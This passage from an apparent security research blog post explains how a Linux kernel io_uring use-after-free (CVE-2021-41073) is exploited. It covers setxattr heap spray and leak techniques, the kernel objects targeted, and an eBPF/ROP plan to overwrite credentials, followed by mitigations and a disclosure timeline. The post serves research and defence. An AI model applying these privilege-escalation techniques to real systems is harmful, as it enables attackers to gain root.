Instead of mapping two pages and setting a `userfaultfd` fault handler on the second page, we create one anonymous mapping and one file mapping, using the `addr` parameter of [mmap](https://man7.org/linux/man-pages/man2/mmap.2.html) to ensure the two pages are contiguous in memory.
### Universal Object Overwrite
The universal heap spray technique is perfect for use-after-frees. After the object has been freed, `setxattr` will trigger the allocation of the object of size `n`, overwrite the first `n-8` bytes, and then block. Since we successfully turned the vulnerability into a use-after-free primitive, we’ll use this to overwrite arbitrary objects in memory that are allocated from the `kmalloc-32` cache.
### Universal Heap Leak - A New Technique
Before thinking about types of objects to overwrite, an information leak technique is needed to find where things are in memory (function addresses, credential structures, heap pointers, etc). I realized I could turn the aforementioned technique from a universal heap spray primitive into a universal heap leak primitive with this one weird trick. In the original UAF use case for this technique, `setxattr` reallocates a buffer that has already been freed. But what if the `setxattr` buffer is freed instead?
### One Weird Trick
First, use the heap spray technique: call `setxattr` which blocks copying the last 8 bytes from user space. At this point most of the data has been copied over to the allocated kernel buffer already. In another thread, trigger the freeing of the `setxattr` buffer, using the bug. Then, trigger the allocation of the object to leak. This should reallocate and overwrite the kernel buffer that `setxattr` is using to store attribute data. Finally, unblock `setxattr`. Now the kernel will use the data in `kvalue` (line 10) to set the file attribute. Extended file attributes are stored as binary data. To get an extended attribute of a file, we can use `setxattr`'s counterpart - `getxattr`. Remember, when the attribute is set, the kernel buffer used is overwritten with the data from the new object.
![[62265f37876402371e98f237_IOURING_10 (1).png]]<p style="text-align: center;"><sub><i>Universal heap leak technique</i></sub></p>
So, the contents of the object can be leaked by calling `getxattr`:
```
setxattr("lol.txt", "user.lol", xattr_buf, 32, 0);
getxattr("lol.txt", "user.lol", leakbuf, 32);
```
### Target Objects
So far I’ve only spoken about general techniques. We haven’t picked what objects we want to use along with the techniques. I haven’t seen the objects I chose used in other exploits, so hopefully it can provide ideas for exploiting a tough cache like `kmalloc-32`.
When first looking for looking for objects, I looked within `io_uring` itself first. There are a lot of interesting objects, many of which contain pointers to cred and `task_struct` structures. I have not seen other kernel exploits utilizing `io_uring` objects until recently, when I came across a [blog post](https://ruia-ruia.github.io/NFC-UAF/) by [Awaru](https://twitter.com/Awarau1) [ [25]](https://ruia-ruia.github.io/NFC-UAF/).
I used a couple of other strategies to find target objects as well. One was using Linux kernel memory tracing on a test machine and seeing what 32-byte objects are allocated. I also wrote a [quick script](https://github.com/chompie1337/kernel_obj_finder) using [pahole](https://linux.die.net/man/1/pahole) to output all of the structures of a specific size. One trick I learned from [Alexander Popov](https://twitter.com/a13xp0p0v)’s [blog post](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html) is to enable features that are common across many distros, which increases the number of kernel objects available [ [26]](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html).
#### Objects To Leak:
**io_tctx_node**:
An [`io_tctx_node`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L890) structure is allocated for a new thread that sends an io_uring request. There can be multiple `io_ctx_node`s in a single process if multiple threads call into `io_uring`. The field to leak is task, the pointer of the thread’s `task_struct`. The allocation of this object can be triggered by creating a new thread and making an `io_uring` system call.
**io_buffer:**
The [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structure is covered at length in the vulnerability section. The field to leak is list, a `list_head` structure that links the buffer to the rest of the buffers in the `buf_group`. Leaking this give the relative position on the slab so the address of the objects sprayed can be calculated. I later realized this object could also be used to build an arbitrary free primitive, by modifying the list members and unregistering multiple buffers. This is just a thought; this technique wasn’t used in this exploit.
**seq_operations:**
A [`seq_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/seq_file.h#L31) structure is allocated when a process opens a [seq_file](https://www.kernel.org/doc/html/latest/filesystems/seq_file.html). This structure stores the pointers to functions that do sequential operations on the file. By opening `/proc/cmdline` , this structure will be allocated. Leaking this object gives a pointer to several functions. In particular, I use the function [`single_next`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/seq_file.c#L596) to break [KASLR](https://dev.to/satorutakeuchi/a-brief-description-of-aslr-and-kaslr-2bbp).
#### Object to Overwrite:
**sk_filter:**
An [`sk_filter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L593) structure is allocated when an already loaded [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story) program is attached to a socket. Of particular interest is the field prog, which contains a pointer to a [`bpf_prog`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L563) structure that represents the attached eBPF program. By overwriting this pointer, we gain kernel execution. One thing to note: because prog is the last field in `sk_filter`, it is not covered in the `n-8` bytes we can write to using the mentioned techniques. However, this is easily fixable. Instead of blocking in `setxattr`, we call `getxattr` immediately after and block. The `setxattr` kernel buffer will be reallocated in `getxattr`, and will be completely overwritten with the desired contents before blocking in `copy_to_user`.
### Putting It all Together
As stated above, we gain execution by overwriting the prog pointer in an `sk_filter`. A `bpf_prog` structure has field [`bpf_func`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L584) which contains a pointer to the function that gets called when the associated socket has data written to it. When the function is called, the second parameter contains a pointer to `bpf_prog` field `insns`, which is an array with BPF instructions that is used by the eBPF interpreter.
At this point, there are a few options:
Put [`bpf_prog_run`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/kernel/bpf/core.c#L1373) for the `bpf_func` field, which is the function that decodes and executes BPF instructions if the program is not JIT compiled. Then put eBPF bytecode instructions that overwrite creds in the `insns` array. This is an option even if eBPF JIT is configured. However, if the Kconfig [`CONFIG_BPF_JIT_ALWAYS_ON`](https://cateee.net/lkddb/web-lkddb/BPF_JIT_ALWAYS_ON.html) is set, the interpreter is not compiled into the kernel.
Another option is to look for [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets in the kernel to call instead. This idea was inspired by [Alexander Popov](https://twitter.com/a13xp0p0v)’s original exploit for [CVE-2021-26708](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html) [ [26]](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html).
We need a gadget that will:
1. Dereference the insns pointer, where we place the pointer `&task_struct→cred`
2. Writes 0 to the uid offset
3. Writes 0 to euid offset
4. Returns
It’s possible to derive the exit value of an eBPF program, so we can first leak the address to `task→cred` and repeat the process with the `uid` and `euid` overwrites. With a leak, the operations can be split up into two ROP gadgets. This gives some flexibility on what gadgets can be used, and increases the likelihood of the kernel containing the necessary gadgets.
There are many other ways to exploit this bug. I came up with a few more ideas while writing this blog post. Can you think of any more?
## Demo
<iframe width="100%" height="500" src="https://www.youtube.com/embed/qkyt6Kb0swk" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Find the proof-of-concept (PoC) exploit code along with a test VM [here.](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073)
## Mitigations
The `io_uring` subsystem introduces a large and rapidly growing kernel code base that is reachable as an unprivileged user. It’s a system call interface so it is inherently hard to sandbox; we depend on system call filtering for sandboxing, ex: [seccomp](https://en.wikipedia.org/wiki/Seccomp) and [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux). `io_uring` redefines how user space interacts with the kernel, and is accessible as an unprivileged user on 5.1 >= kernels, which includes growing number of Android devices. Additionally, you need to enable `CONFIG_EXPERT` in the kernel to even have the option to disable it. For these reasons, I believe `io_uring` is going to have an important impact on the future of Linux related security.
I’ll present mitigations that offer some protection against the exploit techniques I’ve outlined in this post, and discuss their effectiveness. I’ll also present some considerations for the future of Linux kernel hardening.
### Existing Mitigations
First I’ll cover the mitigations for which I’ve already discussed bypasses:
[CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This mitigation is helpful for heap overflow bugs that may depend on contiguous object allocation to be exploitable. However, I don’t believe it is particularly effective for UAF or vulnerabilities giving a controllable free. As Jann Horn notes in [this Linux kernel exploitation writeup](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html), if you can control the order of what gets freed, then you can control the freelist, and the randomization is nullified [ [27]](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html). There is a low performance cost to this mitigation, as the randomization only occurs when a new slab page is allocated.
[CONFIG_BPF_JIT_ALWAYS_ON](https://cateee.net/lkddb/web-lkddb/BPF_JIT_ALWAYS_ON.html) removes the eBPF interpreter from the kernel. The intent of this mitigation is to reduce the number of usable exploitation gadgets. While I’ve discussed a number of bypasses in the context of this exploit, it should always be set if eBPF JIT is enabled. As a mitigation, it comes at no cost performance wise and removes a potential primitive for attackers.
### Some additional suggestions:
[CONFIG_BPF_UNPRIV_DEFAULT_OFF](https://cateee.net/lkddb/web-lkddb/BPF_UNPRIV_DEFAULT_OFF.html) turns off eBPF for unprivileged users by default. This can be modified via a `sysctl` knob while the system is running. Whether this mitigation is appropriate will depend on whether your system needs to let unprivileged users run eBPF programs. If not, turning off eBPF for unprivileged users reduces attack surface in terms of exploiting eBPF itself, as well as making eBPF unavailable to use as a primitive, as shown in this exploit. While this mitigation won’t directly affect the exploitability of this vulnerability, it does block a very useful primitive. This will force an attacker to be more creative and come up with another way to gain kernel execution or read/write abilities.
[CONFIG_SLAB_FREELIST_HARDENED](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html) will check the if a free object’s metadata is valid. This mitigation will not protect against any of techniques shown in this writeup, but it blocks other primitives that can be built with the vulnerability. For example, if a kernel buffer is blocking for a user copy and then freed, the freelist metadata can be overwritten after the copy is unblocked, and an attacker has control over the pointer of the next free object. This type of freelist control primitive is blocked by this mitigation, which first checks whether the free object is actually within a valid slab page before allowing it to be allocated. There are some minor performance costs that come with performing a check for every freed object.
### Future Considerations
Implementing [control flow integrity](https://en.wikipedia.org/wiki/Control-flow_integrity) for eBPF programs would block several of the techniques discussed in this post. When an eBPF program is verified and JIT compiled, the official entry point can be added to a list of valid targets that is checked before a program is run. This would block the previously discussed general ROP technique, the JIT smuggling technique, as well as the interpreter technique (if JIT is turned on).
The next consideration, while not a mitigation, is a simple but fundamental measure to improve software security. The vulnerability exploited in this post would have easily been found if basic unit tests were written for the `IORING_OP_PROVIDE_BUFFERS` feature. It was only after the second exploitable vulnerability in this feature was reported for any tests to be [committed](https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44) [ [32]](https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44). Because of the rapid growth in both system call support and features of `io_uring` in the upstream kernel, it is important to provide accompanying tests so that easily findable vulnerabilities like this one don’t slip by.
## Security Disclosure Timeline
**9/8/2021:** I find the vulnerability. I write a PoC to make sure my assumptions are correct.
**9/11/2021:** I disclose the vulnerability to
[email protected] and share the PoC.
**9/11/2021:** Report is forwarded to `io_uring` developers and acknowledged.
**9/11/2021:** A potential patch is provided.
**9/12/2021:** I review and test the patch. I confirm it fixes the issue. Jens asks me what email I want to use for my “Reported By Tag”. I respond with my work email, to which he is apprehensive because the domain name makes it obvious the patch is a security issue. I give my personal email instead, which he accepts.
**9/13/2021:** [Greg K-H](https://twitter.com/gregkh) responds to my initial report that states I want to coordinate disclosure with the linux-distros mailing list so downstream consumers can apply the patch. He says since most distros sync on stable releases, it is not necessary to get the distro list involved. I don’t get the distro list involved.
**9/13/2021:** I apply for a CVE via [Mitre](https://cve.mitre.org/). CVE-2021-41073 is reserved.
**9/18/2021:** The patch hits upstream and is back ported to affected versions. I send out a [disclosure](https://www.openwall.com/lists/oss-security/2021/09/18/2) via OSS mailing list.
## Reflection on the Linux Kernel and Security Fixes
First, I was impressed with the short time it took going from initial report to pushing a fix. It’s no secret that Linux kernel community can be somewhat caustic to newcomers, but everyone that I interacted with was (mostly) cordial.
The reporting process, however, is confusing. The official guide is out of date and inconsistent, and it seems that everyone that has reported kernel vulnerabilities does so a bit differently. For the most part, everyone emails the linux-distros mailing list, and sometimes a CVE ID is reserved that way. In my case though, I did not contact the linux-distro list because Greg said it wasn’t necessary. Submitting patches is also done via mailing list (so, sent via email). The whole process is hard to understand, compared to modern ways of issue tracking. [This recent blog post](https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch) contains the relevant information that I wish I had available at the time [ [29]](https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch).
Another thing that I noticed is the general culture around security fixes in the Linux kernel. [While this is nothing new](https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/), I was surprised to see how it permeates to a microscopic level [ [30]](https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/). Small things such as modifying “Reported by” tags because the email has “security” in the domain name, or [removing a CVE identifier from a commit message](https://twitter.com/grsecurity/status/1486795432202276864) seem to be a common occurrence [ [31]](https://twitter.com/grsecurity/status/1486795432202276864). What is the benefit gained by obfuscating a security issue, in particular, one that already has an assigned CVE?
Exploitable vulnerabilities are patched in the upstream kernel, without a CVE, or even an honest commit message identifying it as a security bug, all the time. The consequences are of this are undeniable; it has prevented patches for exploitable vulnerabilities from being back ported, and these vulnerabilities are later exploited [in the wild](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html) [ [28]](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html). Attackers are capable of looking through commits to find these hidden vulnerabilities, and they’re incentivized to do so. Defenders shouldn’t be burdened with this as well.
I believe that for Linux kernel security to improve, an updated, straightforward guide on the appropriate way to disclose a vulnerability should be agreed upon and released. Additionally, transparency on what patches address security issues will help prevent downstream consumers from shipping vulnerable software.
## Acknowledgements
[Vitaly Nikolenko](https://twitter.com/vnik5287), for outstanding Linux kernel exploitation research. I used his universal heap spray technique in my exploit and as a basis for my universal heap leak technique.
[Jann Horn](https://twitter.com/tehjh), for outstanding Linux kernel exploitation research. I used his research on schedulers and as well as FUSE blocking in my exploit.
[Alexander Popov](https://twitter.com/a13xp0p0v), for outstanding Linux kernel exploitation research. I used his research as a guide on how to construct this exploit.
[Andréa](https://twitter.com/and_zza), for her incredible work creating the diagrams in this post.
[Ryota Shiga](https://twitter.com/Ga_ryo_), for his excellent post on [exploiting io_uring](https://flattsecurity.medium.com/cve-2021-20226-a-reference-counting-bug-which-leads-to-local-privilege-escalation-in-io-uring-e946bd69177a). This post helped me understand `io_uring` internals when getting started.
[netspooky](https://twitter.com/netspooky), for the blog post title, edits, and general moral support.
## References
1. https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework
2. https://twitter.com/axboe/status/1483790445532512260
3. https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html
4. https://unixism.net/loti/what_is_io_uring.html
5. https://lwn.net/Articles/810414/
6. https://kernel.dk/io_uring.pdf
7. https://unixism.net/loti/tutorial/sq_poll.html
8. https://unixism.net/loti/async_intro.html
9. https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/
10. https://github.com/axboe/liburing
11. https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/
12. https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073
14. https://lwn.net/Articles/813311/
15. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491
16. https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/
17. https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html
18. https://www.spinics.net/lists/io-uring/msg09009.html
19. https://duasynt.com/blog/linux-kernel-heap-spray
20. https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/
21. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
22. https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf
23. https://hammertux.github.io/slab-allocator
24. https://twitter.com/tehjh/status/1438330352075001856
25. https://ruia-ruia.github.io/NFC-UAF/
26. https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
27. https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
28. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html
29. https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch
30. https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/
31. https://twitter.com/grsecurity/status/1486795432202276864
32. https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44